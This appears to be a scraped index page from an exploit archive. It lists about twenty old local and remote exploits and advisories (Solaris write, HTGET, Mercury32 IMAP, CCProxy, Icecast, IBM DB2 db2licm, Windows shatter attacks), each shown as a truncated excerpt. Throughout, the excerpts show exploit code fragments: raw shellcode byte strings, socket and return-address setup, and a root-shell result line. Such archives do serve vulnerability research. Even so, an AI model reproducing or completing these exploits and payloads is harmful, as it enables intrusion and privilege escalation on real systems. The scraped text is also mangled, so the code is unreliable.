Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit

No description provided by source. include stdio.h include unistd.h / /usr/bin/write overflow proof of conecpt. Tested on Solaris 7 x86 Pablo Sor, Buenos Aires, Argentina. 01/2000 [email protected] usage: write-exp shelloffset retaddroffset default offset should work. / long getesp asm"movl...

ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net

Author: SuperHeiAtph4nt0m.org Blog: http://superhei.blogbus.com/ Team: http://www.ph4nt0m.org Data: 2006-04-27 Simple analysis The vulnerability is another one of pregreplace+/e vulnerability,代码 在 \sources\actionadmin\search.php line 1 2 5 8-1 2 6 a 2: if $this-ipsclass-input'lastdate' $this-outp...

Serial Line Sniffer 0.4.4 Buffer Overflow

Original can be found at http://shellcoders.com/sintigan/slsnif-ploit.pl Author: [email protected] http://www.shellcoders.com/ ---------------------------------------- Program ID: Serial Line Sniffer 0.4.4 sintigan@midnight:/home/sintigan$ perl slsnif-ploit.pl sh-3.00 id uid=0root...

Half-Life Server 3.1.1.0 Remote Buffer Overflow Exploit

Exploit for linux platform in category remote exploits ======================================================= Half-Life Server 3.1.1.0 Remote Buffer Overflow Exploit ======================================================= / hoagiehlserver.c Remote exploit for Halflife-Servers. Binds a shell to...

GNU a2ps - Anything to PostScript Not SUID Local Overflow

/ Not added to Local Non Poc section /str0ke / include include include // by lizard / lizstyleatgmail.com // greets go to slider/trog for helpin me // not suid by default ; define VULNTHING "/usr/bin/a2ps" define DEFRET 0xbffffffa - strlensc - strlenVULNTHING define xnullbitch 1100 //im not a asm...

HTGET 0.9.x - Local Privilege Escalation

HTGET 0.9.x - Local Privilege Escalation !/usr/bin/perl ^^^^^^^^^^^^^^^^....,,,,|::::::: HTGET = 0.9.x local lame r00t exploit written by nekd0 of Unl0ck Research Team c .unl0ck research team 2004-2005. http://unl0ck.void.ru ................/^^^^''''|:::::::---- $shellcode =...

HTGET <= 0.9.x Local Root Exploit

No description provided by source. !/usr/bin/perl ^^^^^^^^^^^^^^^^....,,,,|::::::: HTGET = 0.9.x local lame r00t exploit written by nekd0 of Unl0ck Research Team c .unl0ck research team 2004-2005. http://unl0ck.void.ru ................/^^^^''''|:::::::---- $shellcode =...

Aspell (word-list-compress) Command Line Stack Overflow

No description provided by source. / Fuck private exploits . Fuck iranian hacking and security !! teams who are just some fucking kiddies. Fuck all "Security money makers" word-list-compress local exploit - SECU Coded by : c0d3r / root . razavi1366atyahoodotcom word-list-compress is not setuid . ...

Mercury32 Mail Server 4.01 - Pegasus IMAP Buffer Overflow (3)

Mercury32 Mail Server 4.01 - Pegasus IMAP Buffer Overflow 3 Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanilla stack overflow in the SELECT command import struct import socket from time import sleep s = socket.socketsocket.AFINET,...

CCProxy Log - Remote Stack Overflow

include include include pragma commentlib, "ws232" unsigned char EndChar= "x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A"; // HTTP/1.0 unsigned char shellcode = "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05" "xe8xedxffxffxff" / 254 bytes shellcode, xor with 0xee / / offset 92=IP offset 99=PORT/...

Icecast <= 2.0.1 Win32 Remote Code Execution Exploit (modded)

Exploit for unknown platform in category remote exploits ============================================================= Icecast include include ifdef WIN32 include include "winerr.h" define close closesocket else include include include include include include endif define VER "0.1" define PORT 80...

Microsoft Windows - JPEG Processing Buffer Overrun (MS04-028)

!/bin/sh The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw The crafted JPEG header makes Windows crash a couple of different ways 1 First, it crashes when the image is opened. 2 Second, it crashes when hovering the mouse over the image. The pointer overwrite is pretty...

Horde-Chora: Remote code execution

Background Chora is a PHP-based SVN/CVS repository viewer by the HORDE project. Description A vulnerability in the diff viewer of Chora allows an attacker to inject shellcode. An attacker can exploit PHP's file upload functionality to upload a malicious binary to a vulnerable server, chmod it as...

Xsok v1.02 "-xsokdir" local buffer overflow game exploit

Exploit for linux platform in category local exploits ======================================================== Xsok v1.02 "-xsokdir" local buffer overflow game exploit ======================================================== / 0x333xsok 2 = xsok 1.02 local game exploit Happy new year ! 2 : coded ...

shatterCommCtrl.txt

Intro ----- Brett Moore from Security Assesment put me onto this one. XP's Visual Styles, the feature that makes various controls in Windows XP look a less dated, also introduce a new shatter type vulnerability into the OS. Vuln ------- Applications which have the new XPified appearance use...

Solaris Runtime Linker (SPARC) - ld.so.1 Local Buffer Overflow

Solaris Runtime Linker SPARC - ld.so.1 Local Buffer Overflow / ld.so.1 exploit SPARC coded by: osker178 bjr213 psu.edu Alright, so this exploits a fairly standard buffer overflow in the default Solaris runtime linker ld.so.1 discovery by Jouko Pynnonen Only real deviation here from the standard...

Shatter XP

Intro ----- Brett Moore from Security Assesment put me onto this one. XP's Visual Styles, the feature that makes various controls in Windows XP look a less dated, also introduce a new shatter type vulnerability into the OS. Vuln ------- Applications which have the new XPified appearance use...

shatterSEH3.txt

============================================================================ = Shattering SEH III = = [email protected] = http://www.security-assessment.com = = Originally posted: September 29, 2003 ============================================================================ ==...

IBM DB2 - Universal Database 7.2 &#039;db2licm&#039; Local Overflow

/ Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by Juan Manuel Pascual Escriba pask at uninet.edu / char sc= "\x31\xc0" / begin setuid 0 / "\x31\xdb" "\xb0\x17" "\xcd\x80" "\xeb\x1f" "\x5e" "\x89\x76\x08" "\x31\xc0" "\x88\x46\x07" "\x89\x46\x0c" "\xb0\x0b" "\x89\xf3"...

Gopherd 3.0.5 - FTP Gateway Remote Overflow

/ UMN gopherd2.x.x/3.x.x: remote "ftp gateway" buffer overflow. by: vade79/v9 v9 at fakehalo.deadpig.org fakehalo/realhalo three years since last audit, code is a little more secure. but, still found a few potentially exploitable situations. this exploits the "ftp gateway" feature of gopherd. the...